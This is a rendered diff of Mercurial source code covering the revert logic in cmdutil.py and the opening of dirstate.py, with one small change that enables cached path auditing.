3414 backupinteractive = 3 # do backup if interactively modified
3415 backup = 2 # unconditionally do backup
3415 backup = 2 # unconditionally do backup
3416 check = 1 # check if the existing file differs from target
3416 check = 1 # check if the existing file differs from target
3417 discard = 0 # never do backup
3417 discard = 0 # never do backup
3418 if opts.get('no_backup'):
3418 if opts.get('no_backup'):
3419 backupinteractive = backup = check = discard
3419 backupinteractive = backup = check = discard
3420 if interactive:
3420 if interactive:
3421 dsmodifiedbackup = backupinteractive
3421 dsmodifiedbackup = backupinteractive
3422 else:
3422 else:
3423 dsmodifiedbackup = backup
3423 dsmodifiedbackup = backup
3424 tobackup = set()
3424 tobackup = set()
3425
3425
3426 backupanddel = actions['remove']
3426 backupanddel = actions['remove']
3427 if not opts.get('no_backup'):
3427 if not opts.get('no_backup'):
3428 backupanddel = actions['drop']
3428 backupanddel = actions['drop']
3429
3429
3430 disptable = (
3430 disptable = (
3431 # dispatch table:
3431 # dispatch table:
3432 # file state
3432 # file state
3433 # action
3433 # action
3434 # make backup
3434 # make backup
3435
3435
3436 ## Sets that results that will change file on disk
3436 ## Sets that results that will change file on disk
3437 # Modified compared to target, no local change
3437 # Modified compared to target, no local change
3438 (modified, actions['revert'], discard),
3438 (modified, actions['revert'], discard),
3439 # Modified compared to target, but local file is deleted
3439 # Modified compared to target, but local file is deleted
3440 (deleted, actions['revert'], discard),
3440 (deleted, actions['revert'], discard),
3441 # Modified compared to target, local change
3441 # Modified compared to target, local change
3442 (dsmodified, actions['revert'], dsmodifiedbackup),
3442 (dsmodified, actions['revert'], dsmodifiedbackup),
3443 # Added since target
3443 # Added since target
3444 (added, actions['remove'], discard),
3444 (added, actions['remove'], discard),
3445 # Added in working directory
3445 # Added in working directory
3446 (dsadded, actions['forget'], discard),
3446 (dsadded, actions['forget'], discard),
3447 # Added since target, have local modification
3447 # Added since target, have local modification
3448 (modadded, backupanddel, backup),
3448 (modadded, backupanddel, backup),
3449 # Added since target but file is missing in working directory
3449 # Added since target but file is missing in working directory
3450 (deladded, actions['drop'], discard),
3450 (deladded, actions['drop'], discard),
3451 # Removed since target, before working copy parent
3451 # Removed since target, before working copy parent
3452 (removed, actions['add'], discard),
3452 (removed, actions['add'], discard),
3453 # Same as `removed` but an unknown file exists at the same path
3453 # Same as `removed` but an unknown file exists at the same path
3454 (removunk, actions['add'], check),
3454 (removunk, actions['add'], check),
3455 # Removed since targe, marked as such in working copy parent
3455 # Removed since targe, marked as such in working copy parent
3456 (dsremoved, actions['undelete'], discard),
3456 (dsremoved, actions['undelete'], discard),
3457 # Same as `dsremoved` but an unknown file exists at the same path
3457 # Same as `dsremoved` but an unknown file exists at the same path
3458 (dsremovunk, actions['undelete'], check),
3458 (dsremovunk, actions['undelete'], check),
3459 ## the following sets does not result in any file changes
3459 ## the following sets does not result in any file changes
3460 # File with no modification
3460 # File with no modification
3461 (clean, actions['noop'], discard),
3461 (clean, actions['noop'], discard),
3462 # Existing file, not tracked anywhere
3462 # Existing file, not tracked anywhere
3463 (unknown, actions['unknown'], discard),
3463 (unknown, actions['unknown'], discard),
3464 )
3464 )
3465
3465
3466 for abs, (rel, exact) in sorted(names.items()):
3466 for abs, (rel, exact) in sorted(names.items()):
3467 # target file to be touch on disk (relative to cwd)
3467 # target file to be touch on disk (relative to cwd)
3468 target = repo.wjoin(abs)
3468 target = repo.wjoin(abs)
3469 # search the entry in the dispatch table.
3469 # search the entry in the dispatch table.
3470 # if the file is in any of these sets, it was touched in the working
3470 # if the file is in any of these sets, it was touched in the working
3471 # directory parent and we are sure it needs to be reverted.
3471 # directory parent and we are sure it needs to be reverted.
3472 for table, (xlist, msg), dobackup in disptable:
3472 for table, (xlist, msg), dobackup in disptable:
3473 if abs not in table:
3473 if abs not in table:
3474 continue
3474 continue
3475 if xlist is not None:
3475 if xlist is not None:
3476 xlist.append(abs)
3476 xlist.append(abs)
3477 if dobackup:
3477 if dobackup:
3478 # If in interactive mode, don't automatically create
3478 # If in interactive mode, don't automatically create
3479 # .orig files (issue4793)
3479 # .orig files (issue4793)
3480 if dobackup == backupinteractive:
3480 if dobackup == backupinteractive:
3481 tobackup.add(abs)
3481 tobackup.add(abs)
3482 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
3482 elif (backup <= dobackup or wctx[abs].cmp(ctx[abs])):
3483 bakname = scmutil.origpath(ui, repo, rel)
3483 bakname = scmutil.origpath(ui, repo, rel)
3484 ui.note(_('saving current version of %s as %s\n') %
3484 ui.note(_('saving current version of %s as %s\n') %
3485 (rel, bakname))
3485 (rel, bakname))
3486 if not opts.get('dry_run'):
3486 if not opts.get('dry_run'):
3487 if interactive:
3487 if interactive:
3488 util.copyfile(target, bakname)
3488 util.copyfile(target, bakname)
3489 else:
3489 else:
3490 util.rename(target, bakname)
3490 util.rename(target, bakname)
3491 if ui.verbose or not exact:
3491 if ui.verbose or not exact:
3492 if not isinstance(msg, basestring):
3492 if not isinstance(msg, basestring):
3493 msg = msg(abs)
3493 msg = msg(abs)
3494 ui.status(msg % rel)
3494 ui.status(msg % rel)
3495 elif exact:
3495 elif exact:
3496 ui.warn(msg % rel)
3496 ui.warn(msg % rel)
3497 break
3497 break
3498
3498
3499 if not opts.get('dry_run'):
3499 if not opts.get('dry_run'):
3500 needdata = ('revert', 'add', 'undelete')
3500 needdata = ('revert', 'add', 'undelete')
3501 _revertprefetch(repo, ctx, *[actions[name][0] for name in needdata])
3501 _revertprefetch(repo, ctx, *[actions[name][0] for name in needdata])
3502 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3502 _performrevert(repo, parents, ctx, actions, interactive, tobackup)
3503
3503
3504 if targetsubs:
3504 if targetsubs:
3505 # Revert the subrepos on the revert list
3505 # Revert the subrepos on the revert list
3506 for sub in targetsubs:
3506 for sub in targetsubs:
3507 try:
3507 try:
3508 wctx.sub(sub).revert(ctx.substate[sub], *pats, **opts)
3508 wctx.sub(sub).revert(ctx.substate[sub], *pats, **opts)
3509 except KeyError:
3509 except KeyError:
3510 raise error.Abort("subrepository '%s' does not exist in %s!"
3510 raise error.Abort("subrepository '%s' does not exist in %s!"
3511 % (sub, short(ctx.node())))
3511 % (sub, short(ctx.node())))
3512
3512
3513 def _revertprefetch(repo, ctx, *files):
3513 def _revertprefetch(repo, ctx, *files):
3514 """Let extension changing the storage layer prefetch content"""
3514 """Let extension changing the storage layer prefetch content"""
3515 pass
3515 pass
3516
3516
3517 def _performrevert(repo, parents, ctx, actions, interactive=False,
3517 def _performrevert(repo, parents, ctx, actions, interactive=False,
3518 tobackup=None):
3518 tobackup=None):
3519 """function that actually perform all the actions computed for revert
3519 """function that actually perform all the actions computed for revert
3520
3520
3521 This is an independent function to let extension to plug in and react to
3521 This is an independent function to let extension to plug in and react to
3522 the imminent revert.
3522 the imminent revert.
3523
3523
3524 Make sure you have the working directory locked when calling this function.
3524 Make sure you have the working directory locked when calling this function.
3525 """
3525 """
3526 parent, p2 = parents
3526 parent, p2 = parents
3527 node = ctx.node()
3527 node = ctx.node()
3528 excluded_files = []
3528 excluded_files = []
3529 matcher_opts = {"exclude": excluded_files}
3529 matcher_opts = {"exclude": excluded_files}
3530
3530
3531 def checkout(f):
3531 def checkout(f):
3532 fc = ctx[f]
3532 fc = ctx[f]
3533 repo.wwrite(f, fc.data(), fc.flags())
3533 repo.wwrite(f, fc.data(), fc.flags())
3534
3534
3535 def doremove(f):
3535 def doremove(f):
3536 try:
3536 try:
3537 repo.wvfs.unlinkpath(f)
3537 repo.wvfs.unlinkpath(f)
3538 except OSError:
3538 except OSError:
3539 pass
3539 pass
3540 repo.dirstate.remove(f)
3540 repo.dirstate.remove(f)
3541
3541
3542 audit_path = pathutil.pathauditor(repo.root)
3542 audit_path = pathutil.pathauditor(repo.root, cached=True)
3543 for f in actions['forget'][0]:
3543 for f in actions['forget'][0]:
3544 if interactive:
3544 if interactive:
3545 choice = repo.ui.promptchoice(
3545 choice = repo.ui.promptchoice(
3546 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3546 _("forget added file %s (Yn)?$$ &Yes $$ &No") % f)
3547 if choice == 0:
3547 if choice == 0:
3548 repo.dirstate.drop(f)
3548 repo.dirstate.drop(f)
3549 else:
3549 else:
3550 excluded_files.append(repo.wjoin(f))
3550 excluded_files.append(repo.wjoin(f))
3551 else:
3551 else:
3552 repo.dirstate.drop(f)
3552 repo.dirstate.drop(f)
3553 for f in actions['remove'][0]:
3553 for f in actions['remove'][0]:
3554 audit_path(f)
3554 audit_path(f)
3555 if interactive:
3555 if interactive:
3556 choice = repo.ui.promptchoice(
3556 choice = repo.ui.promptchoice(
3557 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3557 _("remove added file %s (Yn)?$$ &Yes $$ &No") % f)
3558 if choice == 0:
3558 if choice == 0:
3559 doremove(f)
3559 doremove(f)
3560 else:
3560 else:
3561 excluded_files.append(repo.wjoin(f))
3561 excluded_files.append(repo.wjoin(f))
3562 else:
3562 else:
3563 doremove(f)
3563 doremove(f)
3564 for f in actions['drop'][0]:
3564 for f in actions['drop'][0]:
3565 audit_path(f)
3565 audit_path(f)
3566 repo.dirstate.remove(f)
3566 repo.dirstate.remove(f)
3567
3567
3568 normal = None
3568 normal = None
3569 if node == parent:
3569 if node == parent:
3570 # We're reverting to our parent. If possible, we'd like status
3570 # We're reverting to our parent. If possible, we'd like status
3571 # to report the file as clean. We have to use normallookup for
3571 # to report the file as clean. We have to use normallookup for
3572 # merges to avoid losing information about merged/dirty files.
3572 # merges to avoid losing information about merged/dirty files.
3573 if p2 != nullid:
3573 if p2 != nullid:
3574 normal = repo.dirstate.normallookup
3574 normal = repo.dirstate.normallookup
3575 else:
3575 else:
3576 normal = repo.dirstate.normal
3576 normal = repo.dirstate.normal
3577
3577
3578 newlyaddedandmodifiedfiles = set()
3578 newlyaddedandmodifiedfiles = set()
3579 if interactive:
3579 if interactive:
3580 # Prompt the user for changes to revert
3580 # Prompt the user for changes to revert
3581 torevert = [repo.wjoin(f) for f in actions['revert'][0]]
3581 torevert = [repo.wjoin(f) for f in actions['revert'][0]]
3582 m = scmutil.match(ctx, torevert, matcher_opts)
3582 m = scmutil.match(ctx, torevert, matcher_opts)
3583 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3583 diffopts = patch.difffeatureopts(repo.ui, whitespace=True)
3584 diffopts.nodates = True
3584 diffopts.nodates = True
3585 diffopts.git = True
3585 diffopts.git = True
3586 operation = 'discard'
3586 operation = 'discard'
3587 reversehunks = True
3587 reversehunks = True
3588 if node != parent:
3588 if node != parent:
3589 operation = 'revert'
3589 operation = 'revert'
3590 reversehunks = repo.ui.configbool('experimental',
3590 reversehunks = repo.ui.configbool('experimental',
3591 'revertalternateinteractivemode')
3591 'revertalternateinteractivemode')
3592 if reversehunks:
3592 if reversehunks:
3593 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3593 diff = patch.diff(repo, ctx.node(), None, m, opts=diffopts)
3594 else:
3594 else:
3595 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3595 diff = patch.diff(repo, None, ctx.node(), m, opts=diffopts)
3596 originalchunks = patch.parsepatch(diff)
3596 originalchunks = patch.parsepatch(diff)
3597
3597
3598 try:
3598 try:
3599
3599
3600 chunks, opts = recordfilter(repo.ui, originalchunks,
3600 chunks, opts = recordfilter(repo.ui, originalchunks,
3601 operation=operation)
3601 operation=operation)
3602 if reversehunks:
3602 if reversehunks:
3603 chunks = patch.reversehunks(chunks)
3603 chunks = patch.reversehunks(chunks)
3604
3604
3605 except patch.PatchError as err:
3605 except patch.PatchError as err:
3606 raise error.Abort(_('error parsing patch: %s') % err)
3606 raise error.Abort(_('error parsing patch: %s') % err)
3607
3607
3608 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3608 newlyaddedandmodifiedfiles = newandmodified(chunks, originalchunks)
3609 if tobackup is None:
3609 if tobackup is None:
3610 tobackup = set()
3610 tobackup = set()
3611 # Apply changes
3611 # Apply changes
3612 fp = stringio()
3612 fp = stringio()
3613 for c in chunks:
3613 for c in chunks:
3614 # Create a backup file only if this hunk should be backed up
3614 # Create a backup file only if this hunk should be backed up
3615 if ishunk(c) and c.header.filename() in tobackup:
3615 if ishunk(c) and c.header.filename() in tobackup:
3616 abs = c.header.filename()
3616 abs = c.header.filename()
3617 target = repo.wjoin(abs)
3617 target = repo.wjoin(abs)
3618 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3618 bakname = scmutil.origpath(repo.ui, repo, m.rel(abs))
3619 util.copyfile(target, bakname)
3619 util.copyfile(target, bakname)
3620 tobackup.remove(abs)
3620 tobackup.remove(abs)
3621 c.write(fp)
3621 c.write(fp)
3622 dopatch = fp.tell()
3622 dopatch = fp.tell()
3623 fp.seek(0)
3623 fp.seek(0)
3624 if dopatch:
3624 if dopatch:
3625 try:
3625 try:
3626 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3626 patch.internalpatch(repo.ui, repo, fp, 1, eolmode=None)
3627 except patch.PatchError as err:
3627 except patch.PatchError as err:
3628 raise error.Abort(str(err))
3628 raise error.Abort(str(err))
3629 del fp
3629 del fp
3630 else:
3630 else:
3631 for f in actions['revert'][0]:
3631 for f in actions['revert'][0]:
3632 checkout(f)
3632 checkout(f)
3633 if normal:
3633 if normal:
3634 normal(f)
3634 normal(f)
3635
3635
3636 for f in actions['add'][0]:
3636 for f in actions['add'][0]:
3637 # Don't checkout modified files, they are already created by the diff
3637 # Don't checkout modified files, they are already created by the diff
3638 if f not in newlyaddedandmodifiedfiles:
3638 if f not in newlyaddedandmodifiedfiles:
3639 checkout(f)
3639 checkout(f)
3640 repo.dirstate.add(f)
3640 repo.dirstate.add(f)
3641
3641
3642 normal = repo.dirstate.normallookup
3642 normal = repo.dirstate.normallookup
3643 if node == parent and p2 == nullid:
3643 if node == parent and p2 == nullid:
3644 normal = repo.dirstate.normal
3644 normal = repo.dirstate.normal
3645 for f in actions['undelete'][0]:
3645 for f in actions['undelete'][0]:
3646 checkout(f)
3646 checkout(f)
3647 normal(f)
3647 normal(f)
3648
3648
3649 copied = copies.pathcopies(repo[parent], ctx)
3649 copied = copies.pathcopies(repo[parent], ctx)
3650
3650
3651 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3651 for f in actions['add'][0] + actions['undelete'][0] + actions['revert'][0]:
3652 if f in copied:
3652 if f in copied:
3653 repo.dirstate.copy(copied[f], f)
3653 repo.dirstate.copy(copied[f], f)
3654
3654
3655 class command(registrar.command):
3655 class command(registrar.command):
3656 def _doregister(self, func, name, *args, **kwargs):
3656 def _doregister(self, func, name, *args, **kwargs):
3657 func._deprecatedregistrar = True # flag for deprecwarn in extensions.py
3657 func._deprecatedregistrar = True # flag for deprecwarn in extensions.py
3658 return super(command, self)._doregister(func, name, *args, **kwargs)
3658 return super(command, self)._doregister(func, name, *args, **kwargs)
3659
3659
3660 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3660 # a list of (ui, repo, otherpeer, opts, missing) functions called by
3661 # commands.outgoing. "missing" is "missing" of the result of
3661 # commands.outgoing. "missing" is "missing" of the result of
3662 # "findcommonoutgoing()"
3662 # "findcommonoutgoing()"
3663 outgoinghooks = util.hooks()
3663 outgoinghooks = util.hooks()
3664
3664
3665 # a list of (ui, repo) functions called by commands.summary
3665 # a list of (ui, repo) functions called by commands.summary
3666 summaryhooks = util.hooks()
3666 summaryhooks = util.hooks()
3667
3667
3668 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3668 # a list of (ui, repo, opts, changes) functions called by commands.summary.
3669 #
3669 #
3670 # functions should return tuple of booleans below, if 'changes' is None:
3670 # functions should return tuple of booleans below, if 'changes' is None:
3671 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3671 # (whether-incomings-are-needed, whether-outgoings-are-needed)
3672 #
3672 #
3673 # otherwise, 'changes' is a tuple of tuples below:
3673 # otherwise, 'changes' is a tuple of tuples below:
3674 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3674 # - (sourceurl, sourcebranch, sourcepeer, incoming)
3675 # - (desturl, destbranch, destpeer, outgoing)
3675 # - (desturl, destbranch, destpeer, outgoing)
3676 summaryremotehooks = util.hooks()
3676 summaryremotehooks = util.hooks()
3677
3677
3678 # A list of state files kept by multistep operations like graft.
3678 # A list of state files kept by multistep operations like graft.
3679 # Since graft cannot be aborted, it is considered 'clearable' by update.
3679 # Since graft cannot be aborted, it is considered 'clearable' by update.
3680 # note: bisect is intentionally excluded
3680 # note: bisect is intentionally excluded
3681 # (state file, clearable, allowcommit, error, hint)
3681 # (state file, clearable, allowcommit, error, hint)
3682 unfinishedstates = [
3682 unfinishedstates = [
3683 ('graftstate', True, False, _('graft in progress'),
3683 ('graftstate', True, False, _('graft in progress'),
3684 _("use 'hg graft --continue' or 'hg update' to abort")),
3684 _("use 'hg graft --continue' or 'hg update' to abort")),
3685 ('updatestate', True, False, _('last update was interrupted'),
3685 ('updatestate', True, False, _('last update was interrupted'),
3686 _("use 'hg update' to get a consistent checkout"))
3686 _("use 'hg update' to get a consistent checkout"))
3687 ]
3687 ]
3688
3688
3689 def checkunfinished(repo, commit=False):
3689 def checkunfinished(repo, commit=False):
3690 '''Look for an unfinished multistep operation, like graft, and abort
3690 '''Look for an unfinished multistep operation, like graft, and abort
3691 if found. It's probably good to check this right before
3691 if found. It's probably good to check this right before
3692 bailifchanged().
3692 bailifchanged().
3693 '''
3693 '''
3694 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3694 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3695 if commit and allowcommit:
3695 if commit and allowcommit:
3696 continue
3696 continue
3697 if repo.vfs.exists(f):
3697 if repo.vfs.exists(f):
3698 raise error.Abort(msg, hint=hint)
3698 raise error.Abort(msg, hint=hint)
3699
3699
3700 def clearunfinished(repo):
3700 def clearunfinished(repo):
3701 '''Check for unfinished operations (as above), and clear the ones
3701 '''Check for unfinished operations (as above), and clear the ones
3702 that are clearable.
3702 that are clearable.
3703 '''
3703 '''
3704 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3704 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3705 if not clearable and repo.vfs.exists(f):
3705 if not clearable and repo.vfs.exists(f):
3706 raise error.Abort(msg, hint=hint)
3706 raise error.Abort(msg, hint=hint)
3707 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3707 for f, clearable, allowcommit, msg, hint in unfinishedstates:
3708 if clearable and repo.vfs.exists(f):
3708 if clearable and repo.vfs.exists(f):
3709 util.unlink(repo.vfs.join(f))
3709 util.unlink(repo.vfs.join(f))
3710
3710
3711 afterresolvedstates = [
3711 afterresolvedstates = [
3712 ('graftstate',
3712 ('graftstate',
3713 _('hg graft --continue')),
3713 _('hg graft --continue')),
3714 ]
3714 ]
3715
3715
3716 def howtocontinue(repo):
3716 def howtocontinue(repo):
3717 '''Check for an unfinished operation and return the command to finish
3717 '''Check for an unfinished operation and return the command to finish
3718 it.
3718 it.
3719
3719
3720 afterresolvedstates tuples define a .hg/{file} and the corresponding
3720 afterresolvedstates tuples define a .hg/{file} and the corresponding
3721 command needed to finish it.
3721 command needed to finish it.
3722
3722
3723 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3723 Returns a (msg, warning) tuple. 'msg' is a string and 'warning' is
3724 a boolean.
3724 a boolean.
3725 '''
3725 '''
3726 contmsg = _("continue: %s")
3726 contmsg = _("continue: %s")
3727 for f, msg in afterresolvedstates:
3727 for f, msg in afterresolvedstates:
3728 if repo.vfs.exists(f):
3728 if repo.vfs.exists(f):
3729 return contmsg % msg, True
3729 return contmsg % msg, True
3730 if repo[None].dirty(missing=True, merge=False, branch=False):
3730 if repo[None].dirty(missing=True, merge=False, branch=False):
3731 return contmsg % _("hg commit"), False
3731 return contmsg % _("hg commit"), False
3732 return None, None
3732 return None, None
3733
3733
3734 def checkafterresolved(repo):
3734 def checkafterresolved(repo):
3735 '''Inform the user about the next action after completing hg resolve
3735 '''Inform the user about the next action after completing hg resolve
3736
3736
3737 If there's a matching afterresolvedstates, howtocontinue will yield
3737 If there's a matching afterresolvedstates, howtocontinue will yield
3738 repo.ui.warn as the reporter.
3738 repo.ui.warn as the reporter.
3739
3739
3740 Otherwise, it will yield repo.ui.note.
3740 Otherwise, it will yield repo.ui.note.
3741 '''
3741 '''
3742 msg, warning = howtocontinue(repo)
3742 msg, warning = howtocontinue(repo)
3743 if msg is not None:
3743 if msg is not None:
3744 if warning:
3744 if warning:
3745 repo.ui.warn("%s\n" % msg)
3745 repo.ui.warn("%s\n" % msg)
3746 else:
3746 else:
3747 repo.ui.note("%s\n" % msg)
3747 repo.ui.note("%s\n" % msg)
3748
3748
3749 def wrongtooltocontinue(repo, task):
3749 def wrongtooltocontinue(repo, task):
3750 '''Raise an abort suggesting how to properly continue if there is an
3750 '''Raise an abort suggesting how to properly continue if there is an
3751 active task.
3751 active task.
3752
3752
3753 Uses howtocontinue() to find the active task.
3753 Uses howtocontinue() to find the active task.
3754
3754
3755 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3755 If there's no task (repo.ui.note for 'hg commit'), it does not offer
3756 a hint.
3756 a hint.
3757 '''
3757 '''
3758 after = howtocontinue(repo)
3758 after = howtocontinue(repo)
3759 hint = None
3759 hint = None
3760 if after[1]:
3760 if after[1]:
3761 hint = after[0]
3761 hint = after[0]
3762 raise error.Abort(_('no %s in progress') % task, hint=hint)
3762 raise error.Abort(_('no %s in progress') % task, hint=hint)
@@ -1,1342 +1,1342 b''
1 # dirstate.py - working directory tracking for mercurial
1 # dirstate.py - working directory tracking for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import collections
10 import collections
11 import contextlib
11 import contextlib
12 import errno
12 import errno
13 import os
13 import os
14 import stat
14 import stat
15
15
16 from .i18n import _
16 from .i18n import _
17 from .node import nullid
17 from .node import nullid
18 from . import (
18 from . import (
19 encoding,
19 encoding,
20 error,
20 error,
21 match as matchmod,
21 match as matchmod,
22 pathutil,
22 pathutil,
23 policy,
23 policy,
24 pycompat,
24 pycompat,
25 scmutil,
25 scmutil,
26 txnutil,
26 txnutil,
27 util,
27 util,
28 )
28 )
29
29
30 parsers = policy.importmod(r'parsers')
30 parsers = policy.importmod(r'parsers')
31
31
32 propertycache = util.propertycache
32 propertycache = util.propertycache
33 filecache = scmutil.filecache
33 filecache = scmutil.filecache
34 _rangemask = 0x7fffffff
34 _rangemask = 0x7fffffff
35
35
36 dirstatetuple = parsers.dirstatetuple
36 dirstatetuple = parsers.dirstatetuple
37
37
38 class repocache(filecache):
38 class repocache(filecache):
39 """filecache for files in .hg/"""
39 """filecache for files in .hg/"""
40 def join(self, obj, fname):
40 def join(self, obj, fname):
41 return obj._opener.join(fname)
41 return obj._opener.join(fname)
42
42
43 class rootcache(filecache):
43 class rootcache(filecache):
44 """filecache for files in the repository root"""
44 """filecache for files in the repository root"""
45 def join(self, obj, fname):
45 def join(self, obj, fname):
46 return obj._join(fname)
46 return obj._join(fname)
47
47
48 def _getfsnow(vfs):
48 def _getfsnow(vfs):
49 '''Get "now" timestamp on filesystem'''
49 '''Get "now" timestamp on filesystem'''
50 tmpfd, tmpname = vfs.mkstemp()
50 tmpfd, tmpname = vfs.mkstemp()
51 try:
51 try:
52 return os.fstat(tmpfd).st_mtime
52 return os.fstat(tmpfd).st_mtime
53 finally:
53 finally:
54 os.close(tmpfd)
54 os.close(tmpfd)
55 vfs.unlink(tmpname)
55 vfs.unlink(tmpname)
56
56
57 def nonnormalentries(dmap):
57 def nonnormalentries(dmap):
58 '''Compute the nonnormal dirstate entries from the dmap'''
58 '''Compute the nonnormal dirstate entries from the dmap'''
59 try:
59 try:
60 return parsers.nonnormalotherparententries(dmap)
60 return parsers.nonnormalotherparententries(dmap)
61 except AttributeError:
61 except AttributeError:
62 nonnorm = set()
62 nonnorm = set()
63 otherparent = set()
63 otherparent = set()
64 for fname, e in dmap.iteritems():
64 for fname, e in dmap.iteritems():
65 if e[0] != 'n' or e[3] == -1:
65 if e[0] != 'n' or e[3] == -1:
66 nonnorm.add(fname)
66 nonnorm.add(fname)
67 if e[0] == 'n' and e[2] == -2:
67 if e[0] == 'n' and e[2] == -2:
68 otherparent.add(fname)
68 otherparent.add(fname)
69 return nonnorm, otherparent
69 return nonnorm, otherparent
70
70
71 class dirstate(object):
71 class dirstate(object):
72
72
73 def __init__(self, opener, ui, root, validate, sparsematchfn):
73 def __init__(self, opener, ui, root, validate, sparsematchfn):
74 '''Create a new dirstate object.
74 '''Create a new dirstate object.
75
75
76 opener is an open()-like callable that can be used to open the
76 opener is an open()-like callable that can be used to open the
77 dirstate file; root is the root of the directory tracked by
77 dirstate file; root is the root of the directory tracked by
78 the dirstate.
78 the dirstate.
79 '''
79 '''
80 self._opener = opener
80 self._opener = opener
81 self._validate = validate
81 self._validate = validate
82 self._root = root
82 self._root = root
83 self._sparsematchfn = sparsematchfn
83 self._sparsematchfn = sparsematchfn
84 # ntpath.join(root, '') of Python 2.7.9 does not add sep if root is
84 # ntpath.join(root, '') of Python 2.7.9 does not add sep if root is
85 # UNC path pointing to root share (issue4557)
85 # UNC path pointing to root share (issue4557)
86 self._rootdir = pathutil.normasprefix(root)
86 self._rootdir = pathutil.normasprefix(root)
87 self._dirty = False
87 self._dirty = False
88 self._dirtypl = False
88 self._dirtypl = False
89 self._lastnormaltime = 0
89 self._lastnormaltime = 0
90 self._ui = ui
90 self._ui = ui
91 self._filecache = {}
91 self._filecache = {}
92 self._parentwriters = 0
92 self._parentwriters = 0
93 self._filename = 'dirstate'
93 self._filename = 'dirstate'
94 self._pendingfilename = '%s.pending' % self._filename
94 self._pendingfilename = '%s.pending' % self._filename
95 self._plchangecallbacks = {}
95 self._plchangecallbacks = {}
96 self._origpl = None
96 self._origpl = None
97 self._updatedfiles = set()
97 self._updatedfiles = set()
98
98
99 # for consistent view between _pl() and _read() invocations
99 # for consistent view between _pl() and _read() invocations
100 self._pendingmode = None
100 self._pendingmode = None
101
101
102 @contextlib.contextmanager
102 @contextlib.contextmanager
103 def parentchange(self):
103 def parentchange(self):
104 '''Context manager for handling dirstate parents.
104 '''Context manager for handling dirstate parents.
105
105
106 If an exception occurs in the scope of the context manager,
106 If an exception occurs in the scope of the context manager,
107 the incoherent dirstate won't be written when wlock is
107 the incoherent dirstate won't be written when wlock is
108 released.
108 released.
109 '''
109 '''
110 self._parentwriters += 1
110 self._parentwriters += 1
111 yield
111 yield
112 # Typically we want the "undo" step of a context manager in a
112 # Typically we want the "undo" step of a context manager in a
113 # finally block so it happens even when an exception
113 # finally block so it happens even when an exception
114 # occurs. In this case, however, we only want to decrement
114 # occurs. In this case, however, we only want to decrement
115 # parentwriters if the code in the with statement exits
115 # parentwriters if the code in the with statement exits
116 # normally, so we don't have a try/finally here on purpose.
116 # normally, so we don't have a try/finally here on purpose.
117 self._parentwriters -= 1
117 self._parentwriters -= 1
118
118
119 def beginparentchange(self):
119 def beginparentchange(self):
120 '''Marks the beginning of a set of changes that involve changing
120 '''Marks the beginning of a set of changes that involve changing
121 the dirstate parents. If there is an exception during this time,
121 the dirstate parents. If there is an exception during this time,
122 the dirstate will not be written when the wlock is released. This
122 the dirstate will not be written when the wlock is released. This
123 prevents writing an incoherent dirstate where the parent doesn't
123 prevents writing an incoherent dirstate where the parent doesn't
124 match the contents.
124 match the contents.
125 '''
125 '''
126 self._ui.deprecwarn('beginparentchange is obsoleted by the '
126 self._ui.deprecwarn('beginparentchange is obsoleted by the '
127 'parentchange context manager.', '4.3')
127 'parentchange context manager.', '4.3')
128 self._parentwriters += 1
128 self._parentwriters += 1
129
129
130 def endparentchange(self):
130 def endparentchange(self):
131 '''Marks the end of a set of changes that involve changing the
131 '''Marks the end of a set of changes that involve changing the
132 dirstate parents. Once all parent changes have been marked done,
132 dirstate parents. Once all parent changes have been marked done,
133 the wlock will be free to write the dirstate on release.
133 the wlock will be free to write the dirstate on release.
134 '''
134 '''
135 self._ui.deprecwarn('endparentchange is obsoleted by the '
135 self._ui.deprecwarn('endparentchange is obsoleted by the '
136 'parentchange context manager.', '4.3')
136 'parentchange context manager.', '4.3')
137 if self._parentwriters > 0:
137 if self._parentwriters > 0:
138 self._parentwriters -= 1
138 self._parentwriters -= 1
139
139
140 def pendingparentchange(self):
140 def pendingparentchange(self):
141 '''Returns true if the dirstate is in the middle of a set of changes
141 '''Returns true if the dirstate is in the middle of a set of changes
142 that modify the dirstate parent.
142 that modify the dirstate parent.
143 '''
143 '''
144 return self._parentwriters > 0
144 return self._parentwriters > 0
145
145
146 @propertycache
146 @propertycache
147 def _map(self):
147 def _map(self):
148 '''Return the dirstate contents as a map from filename to
148 '''Return the dirstate contents as a map from filename to
149 (state, mode, size, time).'''
149 (state, mode, size, time).'''
150 self._read()
150 self._read()
151 return self._map
151 return self._map
152
152
153 @propertycache
153 @propertycache
154 def _copymap(self):
154 def _copymap(self):
155 self._read()
155 self._read()
156 return self._copymap
156 return self._copymap
157
157
158 @propertycache
158 @propertycache
159 def _identity(self):
159 def _identity(self):
160 self._read()
160 self._read()
161 return self._identity
161 return self._identity
162
162
163 @propertycache
163 @propertycache
164 def _nonnormalset(self):
164 def _nonnormalset(self):
165 nonnorm, otherparents = nonnormalentries(self._map)
165 nonnorm, otherparents = nonnormalentries(self._map)
166 self._otherparentset = otherparents
